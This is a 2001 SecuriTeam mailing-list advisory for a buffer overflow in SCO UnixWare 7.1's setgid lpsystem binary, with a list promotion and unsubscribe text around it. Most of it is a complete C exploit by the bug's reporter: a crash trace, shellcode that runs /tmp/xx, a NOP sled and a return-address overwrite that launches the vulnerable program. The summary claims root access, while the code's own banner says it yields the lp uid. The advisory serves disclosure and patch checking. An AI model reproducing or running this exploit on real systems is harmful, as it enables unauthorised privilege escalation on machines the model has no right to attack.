[EXPL] UnixWare 7 lpsystem Exploit Code Released

From: support@securiteam.com
Date: 10/15/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] UnixWare 7 lpsystem Exploit Code Released
Message-Id: <20011014223618.42571138C1@mail.der-keiler.de>
Date: Mon, 15 Oct 2001 00:36:18 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  UnixWare 7 lpsystem Exploit Code Released
------------------------------------------------------------------------

SUMMARY

SCO UnixWare 7.1's sgid-lps '/usr/sbin/lpsystem' will allow any local user
to gain root privilege. The following is an exploit code that can be used
by administrators to verify whether they are vulnerable.

DETAILS

Exploit:
/**
** UnixWare 7.1 LPsystem Xploit BufferOverflow
**
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
**
** Special Greets to: White-B, Pablo S0r & Paco Spain.
**
**
** Technical Details:
**
** # ls -la /usr/sbin/lpsystem
** ---s--x--x 1 root lp 41840 Ap 4 998 /usr/sbin/lpsystem
** #
** # /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
** Segmentation Fault - core dumped
** #
**
**
** Maped with truss :
**
** # truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
**
** [...]
**
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 475
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, 0x0830B740, 1032) = 0
** close(3) = 0
** write(4, " A A A A A A A A A A A A".., 549) = 549
** close(4) = 0
** rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
** open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
** fcntl(3, F_SETLK, 0x07F53C2C) = 0
** fcntl(3, F_GETFL, 0x00000009) = 9
** lseek64(3, 0, 2) = 1542283
** write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
** write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
** close(3) = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
** open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
** close(3) = 0
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
** open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
** ioctl(3, I_CANPUT, 0x00000000) = 1
** getgid() = 103 [ 103 ]
** getuid() = 0 [ 0 ]
** Incurred fault #6, FLTBOUNDS %pc = 0x08072410
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** Received signal #11, SIGSEGV [default]
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** *** process killed ***
**
** Download the patch Sco^s page http://www.sco.com
** Bug reported 04-OCT-2001 and publish in security^s
** pages 08-OCT-2001.
**
** Modify this c0de for u use personal :-)
**/

#include <stdlib.h>
#include <stdio.h>

char scoshell[]= //ShellCode Sco Unixware 7.1 /tmp/xx
 
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/xx\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 100000
#define NOP 0x90

unsigned long get_sp(void) {

  __asm__("movl %esp, %eax");
  
    }

int main(int argc, char *argv[]) {
  
  long int offset=0;
  
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];
  
  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0);
  }
  else if (argc == 2){
    offset=atoi(argv[1]);
    
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    buflen=atoi(argv[2]);
    
  }
  else {
    offset=100;
    buflen=100000;
    
  }
    
  addr=0x8056b10 + offset;
  
  fprintf(stderr, "\nUnixWare 7.1 LPsystem exploit yields uid of lp\n");
  fprintf(stderr, "Alex Hernandez al3xhernandez@ureach.com\n\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
  
  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
  for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
    *(int *)&buf[i]=addr;
  
  execl("/usr/sbin/lpsystem", "lpsystem", buf, NULL);
  
  exit(0);
 
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
al3x hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.